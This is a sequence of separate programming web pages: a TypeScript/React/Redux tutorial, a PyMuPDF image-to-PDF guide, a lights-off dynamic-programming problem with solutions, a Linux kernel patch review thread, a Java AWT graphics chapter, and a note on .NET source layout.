  "typescript": "^3.4.5",
  "webpack": "^4.30.0",
  "webpack-cli": "^3.3.1"
}

Let's first look at the dependencies with the format @types/[npm module here]. If you aren't familiar with what these modules are, look up DefinitelyTyped.
Since most modules are written in JavaScript, they aren't written with proper type definitions. Once you attempt to import a module without any type information into a project that is all typed, TypeScript will complain. To prevent this, the community of contributors at DefinitelyTyped create high-quality type definitions of the most commonly used JavaScript modules so that those modules will integrate as seamlessly as possible with TS. You are probably familiar with the next four. ts-loader is needed because Webpack needs a plugin to parse .ts and .tsx files. (This is similar to babel.) typesafe-actions is a library I use with Redux + TypeScript. Without it, the files can get quite noisy in terms of declaring types for the Store, Reducer, and Actions. This library provides methods that infer type definitions for redux code so that the files are a bit cleaner and focused. webpack and webpack-cli are used to bundle the .ts and .tsx files into one .js file that can be sent to the front end.

Next, let's look at the tsconfig.json file. The purpose of this file is to configure how you want the TS compiler to run.

{
  "compilerOptions": {
    "baseUrl": ".",
    "outDir": "build/dist",
    "module": "commonjs",
    "target": "es5",
    "sourceMap": true,
    "allowJs": true,
    "jsx": "react"
  }
}

baseUrl denotes the base directory used to resolve non-relative module names. outDir directs the compiler where it should put the compiled code. module tells the compiler which JavaScript module system to use. target tells the compiler which JS version to target. sourceMap tells the compiler to create a bundle.js.map along with bundle.js. Because bundling will turn multiple files into one large .js file, troubleshooting code would otherwise be difficult, because you wouldn't easily know which file and which line the code failed at (since everything is just one big file). The .map file maps the bundled file back to the respective unbundled files. tslint.json provides options on how strict or loose you want the TS linter to be.
The various options you can set for the linter can be found online. Normally when I start projects with Redux, I begin at the action creators. Let's quickly review the features that we need to implement: adding an item to a list and removing an item from the list. This means we'll need two action creators, one for adding and another for removing.

import { action } from "typesafe-actions";

// use typescript enum rather than action constants
export enum actionTypes {
  ADD = "ADD",
  DELETE = "DELETE"
}

export const todoActions = {
  add: (item: string) => action(actionTypes.ADD, item),
  delete: (idx: number) => action(actionTypes.DELETE, idx)
};

In the actions.ts file, I'm using the enum feature in TS to create the action constants. Secondly, I'm using the action method provided by the typesafe-actions module. The first argument you pass into the method is a string which represents that action, and the second argument is the payload. The add method will add an item to the list of to-dos, and the delete method will remove an item, based on the provided index, from the list of to-dos. In terms of type safety, what we want in our reducers file is the proper type of the payload, given a specific action. The feature in TypeScript that provides this support is called discriminated unions and type guarding. Consider the example below:

// this is an example of discriminated unions
// this file isn't used in the project
interface ActionAdd {
  type: "ADD",
  payload: string
}

interface ActionDelete {
  type: "DELETE",
  payload: number
}

type Actions = ActionAdd | ActionDelete

function reducer(a: Actions) {
  switch(a.type) {
    case "ADD": {
      // payload is a string
    }
    case "DELETE": {
      // payload is a number
    }
  }
}

Given the shape of the two action objects, we can discriminate between them based on the type property. Using control flow analysis, like if-else or switch-case statements, it's very logical that inside the "ADD" case, the only type that the payload can be is a string.
Since we only have two actions, the payload in the remaining "DELETE" case must be a number. If you are interested in learning more about discriminated unions and type guarding, I would recommend learning more about them here and here. After defining our action creators, let's create the reducer for this project.

import * as MyTypes from "MyTypes";
import { actionTypes } from "../actions/";

interface ITodoModel {
  count: number;
  list: string[];
}

export const initialState: ITodoModel = {
  count: 2,
  list: ["Do the laundry", "Do the dishes"]
};

export const todoReducer = (state: ITodoModel = initialState, action: MyTypes.RootAction) => {
  switch (action.type) {
    case actionTypes.ADD: {
      return { ...state, count: state.count + 1, list: [...state.list, action.payload] };
    }
    case actionTypes.DELETE: {
      const oldList = [...state.list];
      oldList.splice(action.payload, 1);
      const newList = oldList;
      return { ...state, count: state.count - 1, list: newList };
    }
    default:
      return state;
  }
};

In the ITodoModel interface, I'm defining the model (or schema) of our Todo store. It will keep track of how many to-do items we have, as well as the array of strings. initialState is the state the application starts with. Within the todoReducer function, we want type safety within the case statements. Based on the earlier gist, we accomplished that with discriminated unions and type guarding, done by typing the action parameter. We have to first define an interface for every action object, and then create a union of them all and assign that to a type. This can get tedious if we have a lot of action creators; luckily, typesafe-actions has methods to help create the proper typing of the action creators without having to actually write out all the interfaces.
declare module "MyTypes" {
  import { StateType, ActionType } from "typesafe-actions";
  // 1 for reducer, 1 for action creators
  export type ReducerState = StateType<typeof import("../reducers").default>;
  export type RootAction = ActionType<typeof import("../actions/actions")>;
}

Ignoring ReducerState for now and focusing on RootAction: we use a method called ActionType from the module, and import the actions from actions.ts to create the discriminated union types, which are then assigned to a type called RootAction. In todoReducers.ts, we import MyTypes and type the action parameter with MyTypes.RootAction. This allows us to have IntelliSense and autocompletion within the reducers! Now that we have the reducer set up, the ReducerState type from the types.d.ts file allows TypeScript to infer the shape of the state object in the reducer function. This will provide IntelliSense when we try to access the payload object within the Reducer. An example of what that looks like is in the picture below.

IntelliSense in the Reducer

Finally, let's hook up the reducer to the redux store.

import { createStore } from "redux";
import rootReducer from "../reducers";

const store = createStore(rootReducer);

export default store;

Let's recap what we have accomplished up until this point. We have created and typed our action creators using the action method from typesafe-actions. We have created our types.d.ts file, which provides type information on our action creators and reducer state. The reducer has been created and the actions are typed by using MyTypes.RootAction, which provides invaluable auto-completion information for the payload within the reducer's case statements. And lastly, we created our Redux store. Let's change gears and begin working on creating and typing our React components.
I’ll go over examples of how to properly type both function and class based components, along with instructions on how to type both the props and state (for stateful components). import * as React from "react"; import TodoContainer from "./containers/TodoContainer"; export const App: React.FC<{}> = () => { return ( <> <h1>React Redux Typescript</h1> <TodoContainer /> </> ); }; App is a functional component that is typed by writing const App: React.FC<{}>. (FC refers to functional component.) If you aren’t familiar with generics (which is the <{}> ), I think of them like variables but for types. Since the shape of props and state can differ based on different use cases, generics are a way for us to, well, make the component generic! In this case, App doesn’t take any props; therefore, we pass in an empty object as the generic. How do we know that the generic is specifically for props? If you use VS code, IntelliSense will let you know what type it needs. Where it says <P = {}> , it means type {} has been assigned to P, where Pstands for props. For class-based components, React will use S to refer to state. App is a functional component that receives no props and is not connected to the Redux store. Let’s go for something a little more complicated. 
import * as React from "react";
import { connect } from "react-redux";
import { Dispatch } from "redux";
import * as MyTypes from "MyTypes";
import { actionTypes } from "../actions";
import { TodoItem } from "../components";

interface TodoContainerState {
  todoInput: string;
}

interface TodoContainerProps {
  count: number;
  todoList: string[];
  addToDo: (item: string) => object;
  deleteToDo: (idx: number) => object;
}

class TodoContainer extends React.Component<TodoContainerProps, TodoContainerState> {
  constructor(props) {
    super(props);
    this.state = { todoInput: "" };
  }

  handleTextChange = e => {
    this.setState({ todoInput: e.target.value });
  };

  handleButtonClick = () => {
    this.props.addToDo(this.state.todoInput);
    this.setState({ todoInput: "" });
  };

  handleDeleteButtonClick = (idx: number) => {
    console.log("deleting", idx);
    this.props.deleteToDo(idx);
  };

  render() {
    let todoJSX: JSX.Element[] | JSX.Element;
    if (!this.props.todoList.length) {
      todoJSX = <p>No to do</p>;
    } else {
      todoJSX = this.props.todoList.map((item, idx) => {
        return (
          <TodoItem
            item={item}
            key={idx}
            idx={idx}
            handleDelete={this.handleDeleteButtonClick}
          />
        );
      });
    }
    return (
      <div>
        {todoJSX}
        <input
          onChange={this.handleTextChange}
          placeholder={"New To Do Here"}
          value={this.state.todoInput}
        />
        <button onClick={this.handleButtonClick}>Add To Do</button>
      </div>
    );
  }
}

const MapStateToProps = (store: MyTypes.ReducerState) => {
  return {
    count: store.todo.count,
    todoList: store.todo.list
  };
};

const MapDispatchToProps = (dispatch: Dispatch<MyTypes.RootAction>) => ({
  addToDo: (item: string) => dispatch({ type: actionTypes.ADD, payload: item }),
  deleteToDo: (idx: number) => dispatch({ type: actionTypes.DELETE, payload: idx })
});

export default connect(
  MapStateToProps,
  MapDispatchToProps
)(TodoContainer);

OK, TodoContainer.tsx is the most complicated of them all, but I'll walk you through what's going on in the code.
TodoContainer is a React class component because I need it to hold in its state the value for the input box. It is also connected to the redux store, so it'll have MapStateToProps and MapDispatchToProps. First, I've defined TodoContainerState. Since I'll be holding the value of the input box in state, I'll type the property as a string. Next, I've defined TodoContainerProps, which will be the shape of the container's props. Because class-based components can have both state and props, we should expect that there are at least two generics that we need to pass into React.Component.

P for Props and S for State

If you mouse over React.Component, you can see that it takes in three generics: P, S, and SS. The first two generics are props and state. I'm not quite sure what SS is and what the use case is. If anyone knows, please let me know in the comments below. After passing in the generics into React.Component, IntelliSense and autocompletion will work within this.state and for props. Next, we want to type MapStateToProps and MapDispatchToProps. This is easily achievable by leveraging the MyTypes module that we built in the redux section. For MapStateToProps, we assign the store type to be MyTypes.ReducerState. An example of the IntelliSense it will provide is in the below screenshot.

IntelliSense for MapStateToProps

Lastly, we want to have type safety within MapDispatchToProps. The benefit that is provided is a type-safe payload given an action type.

Type-safe payloads

In the screenshot above, I purposely typed item as a boolean. Immediately, the TSServer will pick up that the boolean payload within MapDispatchToProps is not correct, because it's expecting the payload to be a string, given that the type is actionTypes.ADD. TodoContainer.tsx has the most going on, since it is a class-based React component, with both state and props, and is also connected to the store.
Before we wrap up, let's look at our last component: TodoItem.tsx. This component is a functional component with props; code below.

import * as React from "react";

interface TodoItemProps {
  item: string;
  idx: number;
  handleDelete: (idx: number) => void;
}

export const TodoItem: React.FC<TodoItemProps> = props => {
  return (
    <span>
      {props.item}
      <button onClick={() => props.handleDelete(props.idx)}>X</button>
    </span>
  );
};

The shape of the props is defined in the interface TodoItemProps. The type information is passed in as a generic to React.FC. Doing so will provide auto-completion for props within the component. Awesome. Another great feature that TypeScript provides when used with React is IntelliSense for props when rendering React components within JSX. As an example, if you delete idx: number from TodoItemProps and then navigate to TodoContainer.tsx, an error will appear at the place where you render <TodoItem />.

Property 'idx' does not exist

Because we removed idx from the TodoItemProps interface, TypeScript is letting us know that we have provided an additional prop that it couldn't find, idx, into the component. Lastly, let's build the project using Webpack. In the command line, type npm run build. In the public folder within the root directory, you should see bundle.js alongside index.html. Open index.html in any browser and you should see a very simple, unstyled, to-do app.

After webpack build

I hope that I was able to demonstrate the power of TypeScript coupled with React and Redux. It may seem a bit overkill for our simple to-do list app; you just need to imagine the benefit of TS + React + Redux at scale. It will help new developers read the code quicker, provide more confidence in refactoring, and ultimately improve development speed. If you need more reference material, I used the following two Git repos to teach myself. Both these repos have proved invaluable for my learning, and I hope they will be the same for you.
https://morioh.com/p/d51255512a15
To convert images to a pdf file, you may use the python img2pdf library; however, you may run into "Error: Refusing to work on images with alpha channel". To fix this error, you can use Wand and ImageMagick to remove the alpha channel (see: Fix Error: Refusing to work on images with alpha channel Using img2pdf – img2pdf Tutorial).

In this tutorial, we will introduce another way to convert images to pdf without processing the alpha channel at all.

Preliminaries:

```
pip install PyMuPDF
```

Import the python libraries:

```python
import sys, fitz
```

Prepare a png image containing an alpha channel:

```python
imglist = ['e:\\ts.png']
```

Convert this image to pdf:

```python
doc = fitz.open()                        # PDF that will hold the pictures
for i, f in enumerate(imglist):
    img = fitz.open(f)                   # open pic as document
    rect = img[0].rect                   # pic dimension
    pdfbytes = img.convertToPDF()        # make a PDF stream
    img.close()                          # no longer needed
    imgPDF = fitz.open("pdf", pdfbytes)  # open stream as PDF
    page = doc.newPage(width=rect.width,    # new page with ...
                       height=rect.height)  # ... pic dimension
    page.showPDFpage(rect, imgPDF, 0)    # image fills the page
doc.save("e:\\all-my-pics.pdf")
```

In this example, we use a python list to hold the image paths, which means we can convert several images into one pdf at once.

Is the resulting pdf image based or text based? If you convert an image to pdf this way, it is image based. However, if you plan to convert an image to a text-based pdf, you should extract the text from the image first and then convert that text to pdf; you can view more here:
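Why does img2pdf refuse in the first place? It rejects any image whose mode carries transparency. A tiny pre-flight check along those lines (my own sketch, keyed to Pillow-style mode strings; the Pillow calls in the comment assume Pillow is installed and are not part of the tested code):

```python
def needs_flattening(mode):
    """True for Pillow-style mode strings that img2pdf refuses to convert."""
    # 'RGBA', 'LA', 'PA' (and premultiplied 'RGBa', 'La') carry an explicit
    # alpha band; 'P' (palette) images may carry transparency via the palette.
    return "A" in mode.upper() or mode == "P"

# Typical usage with Pillow (not executed here):
#   from PIL import Image
#   im = Image.open("ts.png")
#   if needs_flattening(im.mode):
#       im.convert("RGB").save("ts_flat.png")   # drops the alpha channel
#   # img2pdf will now accept ts_flat.png

print(needs_flattening("RGBA"), needs_flattening("RGB"))  # → True False
```

This is only a convenience check; the PyMuPDF route above sidesteps the whole question because it never hands the raw alpha image to img2pdf.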
https://www.tutorialexample.com/a-simple-guide-to-python-convert-image-to-pdf-without-removing-image-alpha-channel/
Some people leave the lights at their workplaces on when they leave; that is a waste of resources. As a hausmeister of DHBW, Sagheer waits until all students and professors leave the university building, then goes and turns all the lights off.

The building consists of n floors with stairs at the left and the right sides. Each floor has m rooms on the same line with a corridor that connects the left and right stairs, passing by all the rooms. In other words, the building can be represented as a rectangle with n rows and m + 2 columns, where the first and the last columns represent the stairs, and the m columns in the middle represent rooms.

Sagheer is standing at the ground floor at the left stairs. He wants to turn all the lights off in such a way that he will not go upstairs until all lights on the floor he is standing at are off. Of course, Sagheer must visit a room to turn the light there off. It takes one minute for Sagheer to go to the next floor using stairs or to move from the current room/stairs to a neighboring room/stairs on the same floor. It takes no time for him to switch the light off in the room he is currently standing in. Help Sagheer find the minimum total time to turn off all the lights. Note that Sagheer does not have to go back to his starting position, and he does not have to visit rooms where the light is already switched off.

The first line contains two integers n and m (1 ≤ n ≤ 15 and 1 ≤ m ≤ 100) — the number of floors and the number of rooms on each floor, respectively. The next n lines contain the building description. Each line contains a binary string of length m + 2 representing a floor (the left stairs, then m rooms, then the right stairs), where 0 indicates that the light is off and 1 indicates that the light is on. The floors are listed from top to bottom, so the last line represents the ground floor. The first and last characters of each string represent the left and the right stairs, respectively, so they are always 0.
Print a single integer — the minimum total time needed to turn off all the lights.

Sample 1 input:
2 2
0010
0100
Output: 5

Sample 2 input:
3 4
001000
000010
000010
Output: 12

Sample 3 input:
4 3
01110
01110
01110
01110
Output: 18

In the first example, Sagheer will go to room 1 on the ground floor, then he will go to room 2 on the second floor using the left or right stairs. In the second example, he will go to the fourth room on the ground floor, use the right stairs, go to the fourth room on the second floor, use the right stairs again, then go to the second room on the last floor. In the third example, he will walk through the whole corridor, alternating between the left and right stairs at each floor.

Problem summary (translated from Chinese): a person has to turn off all the lights in a building. We are given a map in which 1 means a light is on and 0 means it is off; the building has stairs on both the left and right sides. He starts at the left stairs on the ground floor and cannot go upstairs until every light on his current floor is off. Moving one cell costs one step; find the minimum number of steps needed to turn off all the lights.

Solution (translated from Chinese): DP. Let dp[i][j] be the minimum number of steps needed to reach the stairs on side j of floor i (j = 0 for left, j = 1 for right) after all lights on that floor have been turned off. Remember to consider the case where a floor has no lights on at all. The stairs on the current floor can be reached from either the left or the right stairs of the floor below; take the minimum of the two.

AC code:

```cpp
#include <bits/stdc++.h>
#define mem(a, b) memset(a, b, sizeof(a))
#define INF 0x3f3f3f3f
using namespace std;

int n, m, dp[20][2], l[20], r[20];
string mapp[20];

int main() {
    mem(dp, INF); mem(l, 0); mem(r, 0);
    cin >> n >> m;
    for (int i = n - 1; i >= 0; i--) {   // read floors so that index 0 is the ground floor
        cin >> mapp[i];
        for (int j = 0; j < m + 2; j++)
            if (mapp[i][j] == '1') { l[i] = j; break; }   // leftmost lit cell
        for (int j = m + 1; j >= 0; j--)
            if (mapp[i][j] == '1') { r[i] = j; break; }   // rightmost lit cell
    }
    for (int i = n - 1; i >= 0; i--) {   // drop dark floors above the topmost lit floor
        if (!l[i] && !r[i]) n--;
        else break;
    }
    if (n == 0) { cout << 0 << endl; return 0; }   // all lights are already off
    if (n == 1) { cout << r[0] << endl; return 0; }
    dp[0][0] = 2 * r[0] + 1;   // ground floor: out to the rightmost light and back, then up
    dp[0][1] = m + 2;          // ground floor: across to the right stairs, then up
    for (int i = 1; i < n - 1; i++) {
        if (!l[i] && !r[i]) {  // nothing lit on this floor: just go up
            dp[i][0] = dp[i-1][0] + 1;
            dp[i][1] = dp[i-1][1] + 1;
        } else {
            dp[i][0] = min(dp[i-1][0] + 2 * r[i], dp[i-1][1] + m + 1) + 1;
            dp[i][1] = min(dp[i-1][0] + m + 1, dp[i-1][1] + 2 * (m + 1 - l[i])) + 1;
        }
    }
    cout << min(dp[n-2][0] + r[n-1], dp[n-2][1] + (m + 1 - l[n-1])) << endl;
    return 0;
}
```
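For reference, the same DP rewritten in Python (my own sketch, mirroring the C++ above; not competition-submitted code). It reproduces all three sample answers:

```python
def min_time(n, m, floors):
    """floors: list of n binary strings of length m + 2, top floor first."""
    rows = floors[::-1]                      # index 0 = ground floor
    left = [0] * n
    right = [0] * n
    for i, row in enumerate(rows):
        lit = [j for j, c in enumerate(row) if c == "1"]
        if lit:
            left[i], right[i] = lit[0], lit[-1]
    while n > 1 and left[n-1] == 0 and right[n-1] == 0:
        n -= 1                               # ignore dark floors at the top
    if n == 1:
        return right[0]                      # also covers the all-dark case (0)
    INF = float("inf")
    dp = [[INF, INF] for _ in range(n)]      # dp[i][0]/dp[i][1]: left/right stairs of floor i
    dp[0][0] = 2 * right[0] + 1              # out and back to the left stairs, then up
    dp[0][1] = m + 2                         # across to the right stairs, then up
    for i in range(1, n - 1):
        if left[i] == 0 and right[i] == 0:   # nothing to switch off on this floor
            dp[i][0] = dp[i-1][0] + 1
            dp[i][1] = dp[i-1][1] + 1
        else:
            dp[i][0] = min(dp[i-1][0] + 2 * right[i], dp[i-1][1] + m + 1) + 1
            dp[i][1] = min(dp[i-1][0] + m + 1, dp[i-1][1] + 2 * (m + 1 - left[i])) + 1
    return min(dp[n-2][0] + right[n-1], dp[n-2][1] + (m + 1 - left[n-1]))

print(min_time(2, 2, ["0010", "0100"]))  # → 5
```

One small difference from the C++: keeping n at a minimum of 1 while dropping dark floors also answers 0 for a building with no lights on at all.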
https://blog.csdn.net/qq_40731186/article/details/79967532
On Mon, 29 Nov 2004 14:15:48 PST, Greg KH wrote:

> On Mon, Nov 29, 2004 at 10:48:24AM -0800, Gerrit Huizenga wrote:
> > +#include <linux/module.h>
> > +#include <linux/list.h>
> > +#include <linux/fs.h>
> > +#include <linux/namei.h>
> > +#include <linux/namespace.h>
> > +#include <linux/dcache.h>
> > +#include <linux/seq_file.h>
> > +#include <linux/pagemap.h>
> > +#include <linux/highmem.h>
> > +#include <linux/init.h>
> > +#include <linux/string.h>
> > +#include <linux/smp_lock.h>
> > +#include <linux/backing-dev.h>
> > +#include <linux/parser.h>
> > +#include <asm/uaccess.h>
> > +
> > +#include <linux/rcfs.h>
>
> asm last please.

Fixed.

> > +/*
> > + * Address of variable used as flag to indicate a magic file,
> > + * value unimportant
> > + */
> > +int RCFS_IS_MAGIC;
>
> Shouldn't this be static?

Nope - used across files.

> And what is a "magic" file used for? I see where you set something to
> point to this, but no where do you check for it. What's the use of it?

I believe that these are auto-created file entries which are instantiated
when a class is created, hence they "magically" appear. They are also
special in the sense that they are tied to the life of the class, unlike
other files in the class directories. The MAGIC value is used to help
distinguish these auto-created entries from other entries in a directory.
This is a little bit like "." and ".." but specific to the class creation.

> > +int _rcfs_mknod(struct inode *dir, struct dentry *dentry, int mode, dev_t dev)
> > +{
> > +        struct inode *inode;
> > +        int error = -EPERM;
> > +
> > +        if (dentry->d_inode)
> > +                return -EEXIST;
> > +        inode = rcfs_get_inode(dir->i_sb, mode, dev);
> > +        if (inode) {
> > +                if (dir->i_mode & S_ISGID) {
> > +                        inode->i_gid = dir->i_gid;
> > +                        if (S_ISDIR(mode))
> > +                                inode->i_mode |= S_ISGID;
> > +                }
> > +                d_instantiate(dentry, inode);
> > +                dget(dentry);
> > +                error = 0;
> > +        }
> > +        return error;
> > +}
> > +
> > +EXPORT_SYMBOL_GPL(_rcfs_mknod);
> > +
> > +int rcfs_mknod(struct inode *dir, struct dentry *dentry, int mode, dev_t dev)
> > +{
> > +        /* User can only create directories, not files */
> > +        if ((mode & S_IFMT) != S_IFDIR)
> > +                return -EINVAL;
> > +
> > +        return dir->i_op->mkdir(dir, dentry, mode);
> > +}
> > +
> > +EXPORT_SYMBOL_GPL(rcfs_mknod);
>
> Why 2 mknod functions? Do they both really need to be exported?

I believe they are both exported so resource controllers can create
class specific directories (including corresponding magic files)
in the case of _rcfs_mknod, and rcfs_mknod is the exported fs op
which allows a restricted set of standard user filesystem operations
within the created directory. So, yes.

> > +#define MAGIC_SHOW(FUNC) \
> > +static int \
>
> You mix tabs and spaces in your #defines in this file, please just use
> tabs properly.

Fixed.

> > +static ssize_t
> > +target_reclassify_write(struct file *file, const char __user * buf,
> > +                        size_t count, loff_t * ppos, int manual)
> > +{
> > +        struct rcfs_inode_info *ri = RCFS_I(file->f_dentry->d_inode);
> > +        char *optbuf;
> > +        int rc = -EINVAL;
> > +        ckrm_classtype_t *clstype;
> > +
> > +        if ((ssize_t) count < 0 || (ssize_t) count > TARGET_MAX_INPUT_SIZE)
> > +                return -EINVAL;
>
> But count is an unsigned variable, right? How could it ever be
> negative?

Yep. But see how those nice casts covered up all the warnings? ;-)
(Fixed!)

> > +        if (!access_ok(VERIFY_READ, buf, count))
> > +                return -EFAULT;
> > +        down(&(ri->vfs_inode.i_sem));
> > +        optbuf = kmalloc(TARGET_MAX_INPUT_SIZE, GFP_KERNEL);
>
> kmalloc with a lock held? Is that a good idea?

Lock? Or sema? Sema should be okay here, right?

> You also don't check the return value of kmalloc, that's a bad idea.

Yep - good catch. Fixed.

> > +        __copy_from_user(optbuf, buf, count);
> > +        if (optbuf[count - 1] == '\n')
> > +                optbuf[count - 1] = '\0';
>
> Stripping off a single trailing \n character? Why?

I believe this is the "echo value > /rcfs/class/magic_file". If
there is a newline, it would show up as an extra newline during
an ls. Of course, Shailabh can correct me if I'm wrong on this one.

> > +inline struct rcfs_inode_info *RCFS_I(struct inode *inode)
> > +{
> > +        return container_of(inode, struct rcfs_inode_info, vfs_inode);
> > +}
> > +
> > +EXPORT_SYMBOL_GPL(RCFS_I);
>
> This should be named something sane, and just use a #define for it like
> most other container_of() users.

Stupid name gone. I didn't grok the need for the #define though?

> > +void rcfs_destroy_inodecache(void)
> > +{
> > +        printk(KERN_WARNING "destroy inodecache was called\n");
>
> Do you really want to print this out in "production" code?

Nope. Fixed.

> > +        if (kmem_cache_destroy(rcfs_inode_cachep))
> > +                printk(KERN_INFO
> > +                       "rcfs_inode_cache: not all structures were freed\n");
>
> Shouldn't this really be INFO level? What is a user going to do with
> this information?
>
> > +config RCFS_FS
> > +        tristate "Resource Class File System (User API)"
> > +        depends on CKRM
> > +        help
> > +          RCFS is the filesystem API for CKRM. This separate configuration
> > +          option is provided only for debugging and will eventually disappear
> > +          since rcfs will be automounted whenever CKRM is configured.
> > +
> > +          Say N if unsure, Y if you've enabled CKRM, M to debug rcfs
> > +          initialization.
>
> So is this option going to stay around, or should it always be enabled
> if CKRM is enabled? Why not just do that for the user?

It may be a module, but yes, this should be auto-set in the future when
CKRM is enabled.

gerrit

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  read the FAQ at
http://lkml.org/lkml/2005/2/24/71
Contents:
- Basic Drawing
- Colors
- Fonts
- Images
- Drawing Techniques

If you've read the last few chapters and seen the examples in the tutorial in Chapter 2, A First Applet, then you've probably picked up the basics of how graphical operations are performed in Java. Up to this point, we have done some simple drawing and even displayed an image or two. In this chapter, we will finally give graphics programming its due and go into depth about drawing techniques and the tools for working with images in Java. In the next chapter, we'll explore image processing tools in more detail and we'll look at the classes that let you generate images pixel by pixel on the fly.

The classes you'll use for drawing come from the java.awt package, as shown in Figure 13.1.[1]

An instance of the java.awt.Graphics class is called a graphics context. It represents a drawable surface such as a component's display area or an off-screen image buffer. A graphics context provides methods for performing all basic drawing operations on its area, including the painting of image data. We call the Graphics object a graphics context because it also holds contextual information about the drawing area. This information includes parameters like the drawing area's clipping region, painting color, transfer mode, and text font. If you consider the drawing area to be a painter's canvas, you might think of a graphics context as an easel that holds a set of tools and marks off the work area.

There are four ways you normally acquire a Graphics object. Roughly, from most common to least, they are:
For the most common attributes, like foreground color, background color, and font, we can set defaults in the component itself. Thereafter, the graphics contexts for painting in that component come with those properties initialized appropriately. If we are working in a component's update() method, we can assume our on-screen artwork is still intact, and we need only to make whatever changes are needed to bring the display up to date. One way to optimize drawing operations in this case is by setting a clipping region, as we'll see shortly. If our paint() method is called, however, we have to assume the worst and redraw the entire display. Methods of the Graphics class operate in a standard coordinate system. The origin of a newly created graphics context is the top left pixel of the component's drawing area, as shown in Figure 13.2. The diagram above illustrates the default coordinate system. The point (0,0) is at the top left corner of the drawing area; the point (width, height) is just outside the drawing area at the bottom right corner. The point at the bottom right corner within the drawing area has coordinates (width-1, height-1). This gives you a drawing area that is width pixels wide and height pixels high. The coordinate system can be translated (shifted) with the translate() method to specify a new point as the origin. The drawable area of the graphics context can be limited to a region with the setClip() method. The basic drawing and painting methods should seem familiar to you if you've done any graphics programming. The following applet, TestPattern, exercises most of the simple shape drawing commands; it's shown in Figure 13.3. 
```java
import java.awt.*;
import java.awt.event.*;

public class TestPattern extends java.applet.Applet {
    int theta = 45;

    public void paint( Graphics g ) {
        int Width = size().width;
        int Height = size().height;
        int width = Width/2;
        int height = Height/2;
        int x = (Width - width)/2;
        int y = (Height - height)/2;
        int [] polyx = { 0, Width/2, Width, Width/2 };
        int [] polyy = { Height/2, 0, Height/2, Height };
        Polygon poly = new Polygon( polyx, polyy, 4 );
        g.setColor( Color.black );
        g.fillRect( 0, 0, size().width, size().height );
        g.setColor( Color.yellow );
        g.fillPolygon( poly );
        g.setColor( Color.red );
        g.fillRect( x, y, width, height );
        g.setColor( Color.green );
        g.fillOval( x, y, width, height );
        g.setColor( Color.blue );
        int delta = 90;
        g.fillArc( x, y, width, height, theta, delta );
        g.setColor( Color.white );
        g.drawLine( x, y, x + width, y + height );
    }

    public void init() {
        addMouseListener( new MouseAdapter() {
            public void mousePressed( MouseEvent e ) {
                theta = (theta + 10) % 360;
                repaint();
            }
        } );
    }
}
```

TestPattern draws a number of simple shapes and responds to mouse clicks by rotating the filled arc and repainting. Compile it and give it a try. If you click repeatedly on the applet, you may notice that everything flashes when it repaints. TestPattern is not very intelligent about redrawing; we'll examine some better techniques in the upcoming section on drawing techniques.

With the exception of fillArc() and fillPolygon(), each method takes a simple x, y coordinate for the top left corner of the shape and a width and height for its size. We have picked values that draw the shapes centered, at half the width and height of the applet. The most interesting shape we have drawn is the Polygon, a yellow diamond. A Polygon object is specified by two arrays that contain the x and y coordinates of each vertex. In our example, the coordinates of the points in the polygon are (polyx[0], polyy[0]), (polyx[1], polyy[1]), and so on.
There are simple drawing methods in the Graphics class that take two arrays and draw or fill the polygon, but we chose to create a Polygon object and draw it instead. The reason is that the Polygon object has some useful utility methods that we might want to use later. A Polygon can, for instance, give you its bounding box and tell you if a given point lies within its area.

AWT also provides a Shape interface, which is implemented by different kinds of two-dimensional objects. Currently, it is only implemented by the Rectangle and Polygon classes, but it may be a sign of things to come, particularly when JavaSoft releases the extended 2D drawing package. The setClip() method of the Graphics class takes a Shape as an argument, but for the time being, it only works if that Shape is a Rectangle.

The fillArc() method requires six integer arguments. The first four specify the bounding box for an oval, just like the fillOval() method. The final two arguments specify what portion of the oval we want to draw, as a starting angle and an offset. Both the starting angle and the offset are specified in degrees. Zero degrees is at three o'clock; a positive angle is counterclockwise. For example, to draw the right half of a circle, you might call:

    g.fillArc(0, 0, radius * 2, radius * 2, -90, 180);

See the Dial example in Chapter 11, Using and Creating GUI Components, for an example of some trigonometric gymnastics with arcs.

Table 13.1 shows the shape-drawing methods of the Graphics class. As you can see, for each of the fill() methods in the example, there is a corresponding draw() method that renders the shape as an unfilled line drawing. draw3DRect() automatically chooses colors by "darkening" the current color. So you should set the color to something other than black, which is the default (maybe gray or white); if you don't, you'll just get black on both sides. For an example, see the PictureButton in Chapter 11, Using and Creating GUI Components.
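The arc angle convention is easy to get backwards, so it can help to compute where a given angle actually lands on the oval. AWT measures arc angles with 0 degrees at three o'clock and positive angles running counterclockwise, with the screen's y axis pointing down. The sketch below (in Python rather than Java, purely for brevity, since the convention is plain trigonometry) maps an AWT-style angle to a point on the arc's bounding oval:

```python
import math

def awt_arc_point(x, y, width, height, angle_deg):
    """Point on the oval inscribed in the box (x, y, width, height) at an
    AWT-style angle: 0 degrees at three o'clock, positive counterclockwise."""
    cx, cy = x + width / 2, y + height / 2
    rad = math.radians(angle_deg)
    # The minus sign is because screen coordinates grow downward,
    # so "counterclockwise" on screen means decreasing y.
    return (cx + (width / 2) * math.cos(rad),
            cy - (height / 2) * math.sin(rad))

# The right-half-circle call starts at -90 degrees, i.e. six o'clock:
print(awt_arc_point(0, 0, 2, 2, -90))  # → (1.0, 2.0), the bottom of the circle
```

Sweeping 180 degrees counterclockwise from six o'clock passes through three o'clock to twelve o'clock, which is exactly the right half of the circle.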
There are a few important drawing methods missing from Table 13.1. For example, the drawString() method, which draws text, and the drawImage() method, which draws an image. We'll discuss these methods in detail in later sections.
https://docstore.mik.ua/orelly/java/exp/ch13_01.htm
Because of my involvement with the Design Guidelines effort, I often get asked about "coding conventions" such as tabs v. spaces, where to put the open brace, etc. My usual policy is to not chime in; these issues have a ton of religion around them and little value to external customers. But I was asked by one of my readers, so I thought I'd write a little about how the Framework organizes its source code and what works and what doesn't.

Essentially, the idea is to have a root directory for each assembly: MsCorLib, System.Dll, System.Web.Dll, etc. In those directories we have subdirectories for each namespace, and each type gets its own .cs file. So String would be in:

    \MSCorLib\System\String.cs

And FileStream would be in:

    \MSCorLib\System\IO\FileStream.cs

This is an organizational structure that helps a ton in terms of finding and separating source. You can see this yourself if you look at the Rotor source.

